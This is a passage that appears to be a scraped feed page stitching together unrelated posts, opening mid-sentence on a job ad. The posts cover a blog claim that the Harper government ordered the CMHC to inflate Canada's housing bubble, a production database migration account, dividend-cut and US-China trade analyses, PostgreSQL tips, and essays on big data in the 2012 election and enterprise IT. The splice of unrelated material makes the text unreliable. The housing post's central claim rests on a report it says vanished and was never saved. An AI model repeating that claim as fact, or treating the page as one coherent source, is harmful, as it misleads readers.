    Greenplum, MPP databases, Data Lake strategy, heterogeneous data management, BI/DW, visualization etc). 5+ years of experience with deep understanding in...
    From Virtustream Inc. - Wed, 03 May 2017 20:56:37 GMT - View all United States jobs
              Wed Feb 1st Post #2: Did you know the Housing Bubble in North America was deliberately created by the Feds?   

    Since we are returning, we thought we'd throw up a few posts reviewing how we got to where we are with our Canadian Housing Bubble.

    With all the intense press attention on our housing bubble over the last year or so, China has become the scapegoat for all our housing woes.  And while the world is awash in Chinese money today, it's important to acknowledge the home grown roots of our problem.

    And to understand that... it's crucial to recall how the CMHC was specifically instructed by the Harper Conservatives to create our housing bubble.

    "Say what?", you exclaim!

    It's true.  What is even more astonishing is that the United States also deliberately created their housing bubble too.

    Both nation's predicaments were deliberately crafted.

    After the dot com crash of 1999 and the 2001 terrorist attacks, America had a choice of entering a painful recession (which critics say was desperately needed to correct the imbalance of excessive monetary stimulus in the 1990s) or politicians could kick the can down the road and artificially inflate the economy.

    Economist Paul Krugman, writing in the New York Times on August 2, 2002,  identified the problem:
    The basic point is that the recession of 2001 wasn't a typical postwar slump, brought on when an inflation-fighting Fed raises interest rates and easily ended by a snapback in housing and consumer spending when the Fed brings rates back down again. 
    This was a prewar-style recession, a morning after brought on by irrational exuberance. 
    To fight this recession the Fed needs more than a snapback; it needs soaring household spending to offset moribund business investment. And to do that, as Paul McCulley of Pimco put it, Alan Greenspan needs to create a housing bubble to replace the Nasdaq bubble.
    Yes... you read that correctly. To offset a morbid economy, leading economists were recommending that the US Government and the US Federal Reserve create a housing bubble so that consumers could use that 'sense of wealth' to drive the economy with consumer spending.

    The creation of a housing bubble was a deliberate economic stimulus move.

    And Canada followed America's lead on this.

    In America, from 2002-2008, President George W. Bush almost singlehandedly, through cheap rates, lax regulation, government housing subsidies, presidential boosterism and financial engineering, managed to get the home ownership rate to 70%.

    Following the lead of Republicans in the US, the Canadian Government saw the success of this plan and began pumping the Ownership Society as well. Gifts, incentives and inducements were showered on home buyers and the result was demand swelled, prices popped and a bubble was born.

    The main vehicle for these inducements was the CMHC, or the Canadian Mortgage and Housing Corporation. Founded after World War II to provide housing for returning soldiers, the CMHC's role has grown dramatically in the following 70 years.  A Crown corporation owned by the Government of Canada, it's main function today is  providing insurance for residential mortgage loans to Canadian home buyers. (Note: This insurance isn't for the Canadian who buys a home, rather it protects mortgage lenders against mortgage defaults by home buyers on mortgages with less than 20% down)

    Here's how CMHC and mortgages in Canada evolved in the 2000s:
    • Prior to 1999 you needed 10% for a mortgage and that mortgage had a maximum amortization of 25 years.  CMHC also had limits on how much you could buy with their insurance.
    • Just after 1999 CMHC lowered the down payment to 5% with price limits on how much they would insure depending on the area. Amortizations were still 25 years. There would be no price limit on what they would insure if 10% or more was put down.
    • By Sept. 2003 CMHC allowed 5% down on 25 yr amortizations but they removed all price ceiling limitations. Now any mortgage would be insured regardless of the value of home purchased. 
    • In March 2004 CMHC began allowing Flex-Down products which permitted the 5% down to be borrowed and 1.5% closing costs to be borrowed (essentially zero down, but 95% insured).
    • In March 2006 you had  0% down, 30 yr amortizations. This became 0% down, 35 yr amortizations later in the year.  Interest only payments were allowed for 10 years.
    • In November 2006 CMHC began allowing 0% down, 40 yr amortizations along with interest only payments for 10 years. 
    • Canadian banks ramped this up by allowing up to 7% cash back offers is you would take on a mortgage with them.  You could basically get paid if you bought a house.
    • Not only were the rules surrounding the granting of money loosened, but CMHC's cap for granting mortgages grew from $100 Billion in 2006 to almost $600 Billion by 2014.
    Right there, in all those details, is where all the money originated to fund our housing bubble.

    Conservative Prime Minister Stephen Harper's government altered mortgage and tax rules to the point we had the zero down, forty year mortgage. They allowed Canadians to raid RRSP's for down payments. They created the Home Reno Tax Credit. They gave us the first-time buyer's closing cost gift and they instituted the infamous 'emergency interest rate' which has kept interest rates artificially low since 2009 - an astonishing 8 years! 

    Harper's Conservatives gave us more pro-real estate initiatives than Canadians had seen in the last quarter-century.

    But wait... there's more!

    The most astonishing element, in addition to of all this, was something that has been effectively buried. Something that, now that the mainstream Canadian media have finally turned their attention to the chaos being created by all this malinvestment in Real Estate, are completely unaware of.

    Back in 2009 we profiled series of excellent articles put out by Murray Dobbin. One of them, Dobbin's 2009 article titled 'Why Canada's Housing Bubble Will Burst', garnered significant interest in the blogosphere. In that article he stated:
    • In an effort to prop up the real estate market in 2008 (when affordability nosedived), the Harper government directed the CMHC to approve as many high-risk borrowers as possible and to keep credit flowing. CMHC described these risky loans as "high ratio homeowner units approved to address less-served markets and/or to serve specific government priorities." The approval rate for these risky loans went from 33 per cent in 2007 to 42 per cent in 2008. By mid-2007, average equity as a share of home value was down to six per cent -- from 48 per cent in 2003. At the peak of the U.S. housing bubble, just before it burst, house prices were five times the average American income; in Canada today that ratio is 7.4:1 -- almost 50 per cent higher.
    That's a stunning statement. He's saying the Harper Government specifically directed the CMHC to approve risky loans in an attempt to keep the economy afloat and blow the Housing Bubble even bigger.

    Shortly after the article was written, this blog contacted Dobbin and asked him about the source for this comment.

    Dobbin stated he got the reference from a CMHC report which was freely available on the CMHC website.  

    Your dutiful scribes from this blog checked out the document and read it personally.  Unfortunately we did not download a copy (and if anyone out there did, we would love to know).

    Dobbin's statement was confirmed, CMHC stated in that document that they had been directed by the government to approve as many high-risk borrowers as possible.

    A few months later, when a curious reader asked us about the source for this quote, we went to the CMHC site to forward the link to the report.  It was then we noticed the report had been removed.   When we asked Dobbin about it, he also noted (with surprise) that the report was gone from the CMHC website.  Dobbin also had failed to download a copy.

    Dobbin columns had obviously struck a nerve and CMHC were directed to remove the document from their website.

    Curiously Wikipedia incorporated Dobbin's information into it's database about the CMHC.

    Don't bother to look for it now, tho. Curiously, when we went to reference the site for our original post on this several years ago we discovered that the Wiki CMHC page had undergone a significant sanitization.

    Gone was the notation about CMHC being directed by the Conservative Government to change policy to approve more high risk borrowers.  Also removed were all the statistics about the ballooning level of CMHC backed mortgages.

    In it's place are bland descriptions of CMHC functions. 

    At the top of the page is this warning bar (click on image to enlarge):

    If anyone is interested what the Wiki page used to say, you can still find it at a website called 'the full wiki'. It contains the old information that the Wiki page used to hold. 

    In Slide #7 it states: "In 2008, Canadian home prices started to dip as affordability become the worst on record in many cities. CMHC publicly admitted that it was ordered to approve as many high risk borrowers as possible to prop up the housing marked and keep credit flowing."

    That is a stunning acknowledgement.

    When the American housing bubble popped in 2008, the Conservatives bet heavily they could shield our boom from the 2008 financial crisis. What they did to add fuel to a powder keg which has now grown insanely large as other Central Banks (US Fed and Peoples Bank of China) have flooded the world with Quantitative Easing and excess credit.

    But make no mistake. The foundation of this massive bubble started at home - with the manipulation of CMHC policies.

    (Below are the screen shots of the original Wiki site on CMHC before it was sanitized)


    Email: village_whisperer@live.ca
    Click 'comments' below to contribute to this post.

    Please read disclaimer at bottom of blog.


    This week:

    Over The Hedge
    Stupid Laws
    Guardians Of The Galaxy
    Falcon America

    Music for the show provided by Reed Love.

              Production Database Migration   

    I thought I'd share my experience with moving a heavily used production database for a live website from one server to another this weekend.  The database in question is used to support AspAlliance.com, but since it has been around for a long time, and since getting additional databases has not always been easy or free, there are several other sites that rely on this same database.  Additionally, on AspAlliance.com there are a large number of individual ASP and ASP.NET applications, many of which store their connection string information locally.  I'm still not 100% done tracking down all the apps that need updated, but the important ones are done.

    Why The Move?

    The move was required for a few reasons, mainly centered around performance.  The site's old db server was a shared box that was housing several dozen clients for my host, OrcsWeb, and I was using about 90% of the resources of the server, so it was time for me to be politely asked to leave.  Also, my negotiations for hosting for 2004 netted me a dedicated database server, and moving to it would let me take advantage of its serious horsepower.


    I worked closely with Scott Forsyth of Orcsweb.  Scott is an AspInsider and general IIS and hosting guru.  He also is one of the few people that sleeps as little as I do (though I'm not sure that's by his choice), and he has always been a great aid for me whenever I screw up my sites.  We decided last week that the best time for the move would be late Friday/early Saturday, when traffic to the impacted websites would be minimal.  We pulled some baseline performance benchmarks for the destination server (which was already handling all of the mailing list data for AspAdvice.com) so that we would be able to see how much this new load would impact the server.  In the course of watching how the database performed on the shared server, we were able to observe, by Sql Server login, how many cpu cycles were used in a given time period.  Using this information led us to an idea: since this database is used by half a dozen different websites, including several busy ones, it would be useful to know which ones were responsible for varying amounts of the total load.

    Logging Performance By Username

    Since we needed to update connection strings for all of the sites anyway, we decided that instead of using the same connection string everywhere, we would set up logins for each site.  So we created logins like 'aspadvice.com', 'aspalliance.com', 'ads.aspalliance.com', etc.  After testing that Sql Server didn't mind the '.' in the names, we decided this would work.

    Flipping the Switch

    Shortly after midnight Saturday morning, Scott took detached the old database, copied the files to the new server, and re-attached them.  This process took about 5 minutes, during which time I was ftp-ing web.config files to the various sites to update their connection string information, and Scott was updating a couple of machine.config entries that held similar info.  When the database came up, it didn't work immediately.  We found that for some reason IIS or ASP.NET's connection pool was holding a connection to the old database but was trying to use the new uid.  Each site needed to have its appdomain restarted.  Another issue was that some sites had been using 'ssmith' as their user id, and some of the objects (tables and stored procedures) they were refencing were owned by ssmith.  Now that they were using a domain name as their username, they couldn't view these objects, so we needed to change the owner of these objects to 'dbo' so that all users could use them.  An old script I have (which David Penton originally provided to me) came in very handy, and allowed us to quickly switch all the important objects over to 'dbo' ownership.

    Checking each site and making these db changes, as well as generally monitoring things and seeing how well the new server was performing, took us another hour or so.  Once I was confident that all of the critical sites had been migrated, we set up a Sql Profiler on the shared server to record the requests that were still coming in to it so that I could track down the applications responsible and point them to the new database.

    Lessons Learned

    1. I've moved databases before, so having centralized connection strings was something I already knew the importance of.  Having everything in web.config and/or machine.config files made this move a lot easier than it might otherwise have been.

    2. Even though total downtime was only a matter of minutes, I still got a few concerned IM's from people about the site being down.  I would love to have a better way to move a database from one box to another with less downtime.  A tool that would allow one to copy files from a live database (without the need to detach it) would be helpful here, I think.

    3. Having the right skills is very important.  Some of the tasks required I didn't know how to do or had never done before, but Scott was easily able to accomplish.  I was intimately familiar with my own applications, so I was able to quickly track down the needed configuration settings and change them myself or direct Scott to them.  If either one of us had been novice or unfamiliar with the application, things would have been a lot hairier.

    4. Use separate logins for different sites (and possibly applications) so that you can determine easily which users of your database are responsible for most of its load.  I wasn't sure if the major contributor to the db's load was AspAlliance.com, with its 4M page views per month, or Ads.AspAlliance.com, which serves almost 50M advertisements per month.  It turned out that AspAlliance.com was the major culprit, so now I know I need to work on optimizing its design further (it's quite db chatty at the moment).

              Find Pilots near you. (Pilot database/map)   
              The Pace of Dividend Cuts Announced in 2017-Q2   

    We're almost to the end of 2017-Q2, so we'll take one last snapshot of how the pace of dividend cuts being reported in our ongoing real-time sampling are stacking up for the calendar quarter. First, here's how the second quarter of 2017 compares with the preceding quarter of 2017-Q1:

    Cumulative Announced Dividend Cuts in U.S. by Day of Quarter in 2017, 2017-Q1 and 2017-Q2, Snapshot on 2017-06-21

    As of 21 June 2017, the number of dividend cuts announced during 2017-Q2 is slightly higher than what was reported in 2017-Q1, with 44 in the current quarter's sample as compared to the previous quarter's 41 as of the same relative point of time in the quarter.

    But 2017-Q2 is well behind the year ago quarter of 2016-Q2's total of 59 dividend cut announcements through the similar point of time in the quarter....

    Cumulative Announced Dividend Cuts in U.S. by Day of Quarter, 2016-Q2 vs 2017-Q2, Snapshot on 2017-06-21

    All in all, the number of dividend cuts in the quarter are consistent with recessionary conditions being present in the U.S. economy.

    In our sampling, about 41% of the firms announcing decreases in their dividend payments to their shareholding owners are in the oil and gas sector of the U.S. economy, which follows from the reduced revenues they're earning with reduced oil prices in the global market.

    There is also a high percentage of financial firms and real estate investment trusts in the mix, which combine to account for 25% the total. The remaining firms come from seven different industries, most notably chemical producers that produce agricultural fertilizers, where that industry accounts for 11% of the sampled 44 dividend cutting firms during in the quarter.

    Data Sources

    Seeking Alpha Market Currents. Filtered for Dividends. [Online Database]. Accessed 21 June 2017.

    Wall Street Journal. Dividend Declarations. [Online Database]. Accessed 21 June 2017.

              The U.S. National Dividend Through April 2017   

    How well are typical American households faring so far in 2017?

    To answer that question, we're going to turn to a unique measure of the well-being of a nation's people called the national dividend. The national dividend is an alternative way to measure of the economic well being of a nation's people that is primarily based upon the value of the things that they choose to consume in their households, which makes it very different and by some accounts, a more effective measure than the more common measures that focus upon income or expenditures throughout the entire economy, like GDP, which have proven to not be well suited for the task of assessing the economic welfare of the people themselves.

    In our case, we've developed the national dividend concept that had been originally conceived by Irving Fisher back in 1906, but which fell by the wayside in the years that followed because of the challenge of collecting the kind of consumption data needed to make it a reality. That kind of data exists today, which is why we've been able to bring it back to life.

    With that introduction now out of the way, let's update the U.S.' national dividend through the end of April 2017 following our previous snapshot through the end of 2016.

    Monthly National Dividend, January 2000 through April 2017

    In the first four months of 2017, we see that in nominal terms, the national dividend has risen strongly following a lackluster 2016. That observation holds after adjusting for inflation, which suggests that the typical American household is benefiting from real growth.

    You can see that perhaps better with our calculation of the year over year growth rates for the nominal and inflation-adjusted national dividend, which we show in the following chart from January 2001 through April 2017.

    Year Over Year Growth Rates for the Monthly National Dividend, January 2001 through April 2017

    Year to date, the upward trend for 2017 appears to be much better than the previous downward trend through 2016 was.

    Previously on Political Calculations

    The following posts will take you through our work in developing Irving Fisher's national dividend concept into an alternative method for assessing the relative economic well being of American households.


    Chand, Smriti. National Income: Definition, Concepts and Methods of Measuring National Income. [Online Article]. Accessed 14 March 2015.

    Kennedy, M. Maria John. Macroeconomic Theory. [Online Text]. 2011. Accessed 15 March 2015.

    Political Calculations. Modeling U.S. Households Since 1900. 8 February 2013.

    Sentier Research. Household Income Trends: April 2017. [PDF Document]. 23 May 2017. [Note: We have converted all the older inflation-adjusted values presented in this source to be in terms of their original, nominal values (a.k.a. "current U.S. dollars") for use in approximating the national dividend.]

    U.S. Bureau of Labor Statistics. Consumer Expenditure Survey. Total Average Annual Expenditures. 1984-2015. [Online Database]. Accessed 7 February 2017.

    U.S. Bureau of Labor Statistics. Consumer Price Index - All Urban Consumers (CPI-U), All Items, All Cities, Non-Seasonally Adjusted. CPI Detailed Report Tables. Table 24. [Online Database]. Accessed 13 June 2017.

              Uncovering a Hidden Story in U.S.-China Trade   

    There is a surprising story that is flying under the radar in almost all of the reporting on the United States' trade with China in April 2017. To see what we mean, here is are some key excerpts from a recent news report following the U.S. Census Bureau's reporting of its foreign trade balance data for the month (emphasis ours):

    The U.S. trade deficit widened more than expected in April amid a surge in cellphone imports, suggesting trade could be a drag on economic growth in the second quarter....

    Exports to China increased 2.2 percent, but the value of goods shipped to Mexico and Canada dropped 10.3 percent and 9.0 percent, respectively. Exports to Germany tumbled 13.3 percent....

    Imports of goods and services increased 0.8 percent to $238.6 billion. Cellphone imports jumped $1.8 billion, accounting for the bulk of the increase in consumer goods imports. Imports of industrial supplies, however, fell $1.5 billion, with crude oil imports declining $1.9 billion.

    The country imported 229 million barrels of oil in April, the smallest amount since October 2016. Imports of goods from China jumped 9.6 percent. Imports from Germany fell 4.1 percent.

    The politically sensitive U.S.-China trade deficit increased 12.4 percent to $27.6 billion in April, while the trade gap with Germany rose 4.3 percent to $5.5 billion.

    We selected these particular excerpts because we want to focus in on two aspects of the reporting.

    • The trade balance between the U.S. and China.
    • Oil imports and exports.

    If you read the article in full, you would never know that U.S. exports to China increased in April 2017 by 20.8% over their April 2016 level, which is faster that the 13.6% year over year rate of growth for China's exports to the U.S.

    Year over Year Growth Rate of U.S.-China Exchange Rate-Adjusted Trade in Goods and Services, January 1986 through April 2017

    Despite the U.S.' faster rate of export growth, the U.S.-China trade deficit widened because the base value of the goods and services that China exports to the U.S. is nearly four times as large as the value of what the U.S. exports to China. If however the U.S. can continue to grow its exports to China at a faster rate than it grows its imports, that gap will narrow.

    That brings us to oil, which has recently become a major export product for the U.S. economy, where China is becoming a very large consumer. [If you're reading this article on a site that republishes our RSS news feed, please either click here to access a static copy of the interactive image showing the volume of oil exported from the U.S. to China in each month from January 1993 through March 2017 below, or just click through to the version of the article that appears our site.]

    If you go back to the article we quoted at the beginning of this analysis, since it only discusses U.S. oil imports without any mention of U.S. oil exports, you might never know that that increased U.S. exports of oil to China accounted for 43% of the $1.2 billion year over year increase in the value of the U.S.' total exports to that nation for April 2017.

    And that's the hidden story in U.S.-China trade. In becoming a major oil-exporting nation over the last year, the U.S. has the means to significantly shrink its trade deficit with China, thanks to that nation's growing appetite as the world's largest consumer of petroleum and other hydrocarbon products, where oil has the potential to replace soybeans as the U.S.' top export product to China.

    That new trade can also provide a more direct indication of the relative health of China's economy, which we'll explore in greater detail in the future.

    Data Sources

    U.S. Census Bureau. Trade in Goods with China. Accessed 5 June 2017.

    Board of Governors of the Federal Reserve System. China / U.S. Foreign Exchange Rate. G.5 Foreign Exchange Rates. Accessed 5 June 2017.

    Energy Information Administration. U.S. Exports to China of Crude Oil and Petroleum Products (Thousand Barrels). [Online Database]. Accessed 5 June 2017.

              Introduction to Full Text Indexing   
    Full text indexing in postgresql is a little more complicated to set up compared to other databases.

    This is a quick introduction on how to install it, how to set it up and how to keep it up to date.

              Using Explain   
    Now that you've set up a database, you need to check it's being utilized properly.

    Using 'Explain' to check your queries are using an index is a good way to do it. Here's a quick introduction in to reading the output.

              Calculating database size   
    Postgresql creates directories to keep each database in. These directories aren't names, they are kept as the 'OID's of each database (oid's are "object identifiers"). This saves issues when you rename databases etc.

    How then do you find out a databases size?

    There is a "contrib" module called 'dbsize' which can do it for you. These modules don't get installed by default but allow extra functionality quite easily.

    See the documentation for details on how to use it.

              How to index a database   
    Database indexing can be quite tricky. Here is a basic guide on how to get started with it, when you should index and when you shouldn't.

    Written for Interspire
              Showing Running Queries   
    Newer versions of PostgreSQL have a 'pg_stat_activity' view to show you who is currently connected to your database system.

    By default, this doesn't show you the queries being run.

    How do you show that?

    Edit your postgresql.conf file and add (or uncomment):

    stats_command_string = true

    and restart postgresql.

    See official documentation for more information.

    (This is practically equivalent to the mysql 'show processlist' command).

              Introduction to Database Datatypes   
    Databases can store lots of different data in quite a few different ways. This guide shows some of the basic and common types you'll run across and how to pick which type is the right one to use.

    Written for Interspire
               Big Data : In Election And In Business Creates Big Impact   

    The US Election results and the process have created worldwide impact. Not only it was noticed for electing someone for arguably the most powerful office in the world, it brings along with it many innovations and advances. In 2008, when Mr. Obama won the elections for the first time, it was very clear that technology played a substantial role in his assuming office. We saw in 2008, that online world was leveraged in a big way in the campaigns for a very successful outcome,. In the just concluded 2012 election, clearly data, data insights and data centric predictions played a very big role in shaping the election outcome. Lot of deserved kudos went in the direction of Nate Silver for his super accurate predictions of the election results based on data insights. Many people looked at it from different perspectives. Media industry focused on how works like this will in an of itself influence the media coverage of elections and assessment of preference trends in election. Nate is the author of Amazon best-selling book, “The Signal and the Noise: The Art and Science of Prediction“. In the days leading up to the election, he was on every major media show, explaining how a detailed analysis of huge amounts of data, distilled from many different sources, enabled him and his team to predict with a fair degree of confidence and certainty what would happen district by district in the US elections (It’s actually a great reward to see this appearance of Nate Silver, on Stephen Colbert’s story show, reported by the LA Times). Very clearly, he was accurate to the last level of detail, in an election when the swings were noticed by both and in the days close to the election, the “momentum vote ” of the challenger was supposed to be mucking the trends.

    A lovely article by John McDermott at AdAge brings out that Silver’s work will help transform the shift the “touch and feel aspects” of reporting to reporting that is anchored in data - facts & statistics. The article quotes ComScore’s Online traffic analyst Andrew Lipsman as saying , “Now that people have seen [data analysis centered political analysis] proven over a couple of cycles, people will be more grounded in the numbers.” Chatter in the online world quoting Bloomberg as the source suggested that , Barack Obama’s site was placing 87 tracking cookies on people’s computers who access the site. Mitt Romney’s site was placing 48 tracking cookies on people’s compute. Tarun Wadhwa reports at Forbes that the power of big data has finally been realized in the US political process:

    “Beyond just personal vindication, Silver has proven to the public the power of Big Data in transforming our electoral process. We already rely on statistical models to do everything from flying our airplanes to predicting the weather. This serves as yet another example of computers showing their ability to be better at handling the unknown than loud-talking experts. By winning ‘the nerdiest election in the history of the American Republic,’ Barack Obama has cemented the role of Big Data in every aspect of the campaigning process. His ultimate success came from the work of historic get-out-the-vote efforts dominated by targeted messaging and digital behavioral tracking.” This election has proven that the field of “political data science” is now more than just a concept – it’s a proven, election-winning approach that will continue to revolutionize the way campaigns are run for decades to come. It is common knowledge that the campaign had been heavily leveraging the web platform in very many sophisticated ways. The campaign spectacularly succeeded in integrating political infrastructure with the web infrastructure that they managed to create. A peer-to-peer, bottoms up campaign seemed to be the strategy that finally delivered results. Volunteer participation, feedback synthesis and citizen vote drives were successfully brought out in massive scale hitherto unknown with the web platform. The campaign heavily shaped by the power of social networks and internet energized the youth power in unimaginable ways signifying the triumph of technology power. It’s a treat to watch : Mobile, Social and Big Data coming together and making an impact in this presidential election 2012.

    Let’s look at the complexities involved in this exercise : There was a notable shift of demographics in America resulted in the traditional vote bases being less influential (this trend will continue dramatically in the future) – the absolute numbers may not have come down but the proportion in the votable base lowered somewhat –leaving the destiny in the hands of newly emerging swing voter base. Technology played a significant role in doing the rigorous fact checking – imagine during a presidential debate – typical citizens were looking at fact checking analysis in their other screens while watching the debate on the television. Pew research found that many were looking at dual screens while watching the debate. All well, till one looks at the paradox here – as more and more effort is made and money is spent to flood the media with political messages, the impact is significantly less, as people don’t rely on a single news source. Many American homes today are getting to embrace the “four screen” world (TV, laptop, tablet and phone, all use in tandem for everything in our lives) and so the ability to create impact on any promotion is actually becoming tougher and tougher (to create positive impact).

    This is observed along with the fact that the U.S is also undergoing a deep structural and institutional change, affecting every walk of the American Life. While the online world is growing, it’s a common citing in the cities and downtowns where one can see established chains closing shops, unable to hold on to competition striking at them from the cyberworld. Trends like this clearly influence the economic role played by different industries, trends in wealth creation, job creation, city growth etc. Younger voters are more clued by default to these changing trends and their impact and so begin to think of their prospects from a different prism compared to older voters, who generally hold conventional views and so this further creates a deeper strata within the society.

    Time Magazine has Michael Scherer doing an in-depth assessment on the role big data and data mining played in Obama’s campaign as well. Campaign manager Jim Messina, Scherer writes, “promised a totally different, metric-driven kind of campaign in which politics was the goal but political instincts might not be the means” and employed a massive number of data crunchers to establish an analytics edge to the campaign. The campaign team put together a massive database that pulled information from all areas of the campaign — social media, pollsters, consumer databases, fundraisers, etc. — and merged them into one central location. The current US President’s (Mr.Obama) campaign believed that biggest institutional advantage over its opponent’s campaign was its data and went out of its way to keep the data team away from the glare and made them work in windowless rooms and each of the team members were given codenames. That in and of itself signifies the importance the campaign attached to “Data – Big Data”- that’s!

    Scherer adds: “The new megafile didn’t just tell the campaign how to find voters and get their attention; it also allowed the number crunchers to run tests predicting which types of people would be persuaded by certain kinds of appeals.” Scherer’s piece is an astoundingly fascinating look at how data was put to use in a successful presidential campaign. The election results are in a way a big victory for the nerds and big data. Similarly, some time back there was a sensational article on how Target figured a teenage girl was pregnant even before her father could find it. Inside enterprises, there must be big advocates to create frameworks to get to we are big advocates of the “know everything” through the world of data and align the business to succeed.

    Large-scale data gathering and analytics are quickly becoming a new frontier of competitive differentiation. While the moves of online business leaders like Amazon.com, Google, and Netflix get noted, many traditional companies are quietly making progress as well. In fact, companies in industries ranging from pharmaceuticals to retailing to telecommunications to insurance have begun moving forward with big data strategies recently. Inside business enterprises, there’s a similar revolution happening – collection of very fine grained data and making them available for analyses in near real time. This helps enterprises learn about the preferences of an individual customer and personalize the offerings for that particular customer /unique customer experience that would make them come back again and again to do more business. Practically speaking, one of the largest transformations that has happened to large enterprises, has involved implementing systems, like ERP, enterprise resource planning; CRM, customer relationship management; or SCM, supply chain management—those large enterprise systems that companies have spent huge swathe of dollars on. These systems typically manage operations extremely well and then set the stage for enterprises to gain business intelligence and learn how they could be managed differently. That’s where Big Data frameworks come in handy and it’s up to business now to seize that opportunity and take advantage of this very fine-grained data that just didn’t exist in similar forms previously. Too few enterprises today fully grasp big data’s potential in their businesses, the data assets and liabilities of those businesses, or the strategic choices they must make to start leveraging big data. By focusing on these issues, enterprises can help their organizations build a data-driven competitive edge, which in this age is clearly a very powerful determinant of success.

              The Next Wave Of Technology Led Business Gains   

    I was in a long conversation with the CIO of Fortune 500 company recently and invariably the conversation turned towards how much it is becomimg difficult for IT organization to continue to delight the business – the world of business itself is undergoing massive changes while the world of technology is also changing very fast. The IT organization is supposed to be on top of these whirlwind of change and continue to support the current and also be the enabler of change for the future. All this when dollars and cents spent on IT matters more than ever. This week, as I finished by keynote address at PSGTECH and sat for questions, more and more of this began to look clear to me.

    Let’s look from the outside – what are the contours of deep change that need to be understood to remain relevant for today and stay competitive. Starting from the dawn of this new century, there has been a deep rooted shift in the sphere of IT innovation. Earlier, the new technology/product/systems that hit the market set their foot mostly at the Fortune 500 companies ( typifying high spend, highly mature, high growth areas of applied IT innovation). Then the medium sized enterprises would try and adapt those systems and the SOHO, Consumer segments would get to use them in time. This flow seems to have reversed noticeably in the last decade. It may not be an overstatement to say that today we see that more cool and modern technology tends to get adopted and popularised at the consumer, SOHO end of the spectrum before moving onto the late adopter class : medium and large enterprises.

    It may be too tempting to dismiss such claims as outlandish or not based on limited set of data – but unargualbly the trend is set and widely recogniseable. This can also be seen by some as not a matter of great concern ot the large enterprises. For some inside the large enterprises for decades such things have never nothered them – after all they are the biggest spenders of IT and have traditionally leveraged IT substantially with proven methods of success. For some inside the enterprise, the consumer centric services like social sites games are all mindless distraction and these should find no place inside the large enterprises.

    Whats my view on this? Are the large enterprises correct in taking such a “Prim & Propah” view? No – An emphatic and clear “NO”. What’s happening in the Consumer, Social, Mobile space is nothing short of creating a new paradigm of doing business – it’s like as if a new set of DNA strands are coming together to create a new organism per se, Nothing sort of this. Those enterprises that fail to recognize this or choose to not participate in this journey would be missing out a huge chance of business success potential.

    Let’s look deeper here: The Twitter, Facebook. Google Plus and Mobile are actually creating a new sort of connected world, wherein new rules of presence, social relationships and collaborations are getting shaped. Needless to say that these new rules would be the drivers/enablers of innovation and competitive success for tomorrow. And that big enterprises would approach that tomorrow faster than they have seen at any point in time in the past would approach The digital natives who are at the forefront of this revolution, would never allow this journey to be slowed/halted. For big and medium enterprises that is following a “Wait & Watch” attitude, they will be failing demonstrably in their abilities to reach out to a new generation of customers/stakeholders, who are beating their drums to a different future. And inside these enterprises, a phenomenal opportunity to redefine ways of working and foster effective collaboration would get lost if large and medium enterprises don’t adopt this quick enough.

    Enter the world of connectedness: by Social - from car buying to university selection to travelling to holiday shopping to medical concerns, the world is getting engulfed with social tools and mechanisms. Look deeper, at the heart of the social phenomenon: In one sense, the people who matter, the consumers – they are connecting with one another in an unprecedented manner, creating a vast and efficient network of information that shapes and steers experiences and markets. What do they get out of this: The participants are beneficiaries of a new genre of collective intelligence that informs and guides people in real time in a myriad number of ways. By making available a platform that is universally accessible – which facilitates discussions of the experiences consumers have had with brands, businesses, a new we have created a new world of consumer influence.

    The consumer world has adopted this world much faster than expected right from Googling to get an instant answer to points of interest, doing comparative shopping, assessing medical facilities to electronics shopping to university education comparison. One can see a pool of like oriented people sharing their views, out of which any information seeker can draw appropriate inferences. All at a click away, in a realtime basis.

    Now lets turn our attention to look at the enterprise in the same perspective.

    From the industry supply side, it can be seen that the enterprise software industry can't avoid the glaringly noticeable trend therein. This is an industry - seen as ever-maturing by some and "never maturing" by others - and an ecosystem that is demonstrating growth indicators which are now becoming visible to all observers. A range of data clearly supports the notion of growth: starting from value added by the industry over the last few years - take the number of people that the industry employs, the projected growth rates, the capital outlay for the industry, and so on.

    The consumerization of the enterprise is moving ahead at full speed and may become irreversible. While some enterprises are experimenting with this –wherever adoption has happened the surge in interest appears high promising to make the adoption of such technologies faster and deeper within enterprises. The interesting part of the equation is that a number of newcomers are coming with a variety of solutions but enterprises see before them humongous opportunities for differentiation and for fostering competitive advantage in adopting such technologies.

    Most of the enterprises are still in a slow adoption mode. Are enterprises looking at moving beyond email as the standard way of communication? Most of the CIO’s/ IT department take a big breath before trying to introduce any new technology inside their enterprise. It’s a classic problem – 75% or more of the enterprise IT spend goes towards supporting investments/assets built in the past aka legacy systems. How does enterprise get to attack this cost structure. What’s the magic wand to make the enterprises adopt technology at the same speed as the consumer world is embracing.

    Clearly the answer lay in a combination of vendor lock-in mechanisms and data lock-in mechanisms. Vendor lock-ins are getting manageable with the body of knowledge in how to manage them having improved substantially over time, question that begs an answer is what is data /information lock-in? It’s clearly the system of record. In a number of conversations with CIO’s who want to move ahead and try new technologies the defining question that gets raised is my backbone systems should not be tinkered with while you build a jazzy front office apps using collaborative tools and mechanisms and then the question is how much more can the whole thing put together be more effective.

    If you examine closely, the system of records that anchors the enterprise system internally ( which used to help in creating leading edge enterprise solutions) though may look to be working fine may not be necessarily perfect in their composition. So much of maintenance spend has to be committed to make this perform continually, a challenge that lock-ins always bring to the fore. All cost optimizations inside enterprise IT have been traditionally focused on infrastructure, outsourcing etc.

    In this flat economy and a maturing IT discipline, the common denominator across the board is that enterprise suffer from a serious commoditization curve effect and to create and sustain a competitive advantage through IT would call for looking at getting their core business processes get architected very differently and in a manner that competition may not find it easy to imitate or catch-up. Such core processes would in areas like customer support, supply chain, channel management etc. Here the IT system needs to be more flexible and adaptive for varied forms of collaboration as against a rigid form of communication. Such a type of arrangement where new forms of collaborations can be enabled to provide high quality enablement for business would be a strong leading edge differentiator for any enterprise.

    The underlying factor here is being able to tap new order of productivities not just the glamour of a new tool being brought in and this is precisely the next orbit of progress for IT inside enterprises. Here the role IT plays goes beyond setting up the information backbone to helping in creating intelligent business by business empowerment – starting all the way from the bottom to the top of the organizations, particularly by empowering more and more operational executive better, transcending all the barriers of language, geography just as the consumer world has shown how effective it could be .

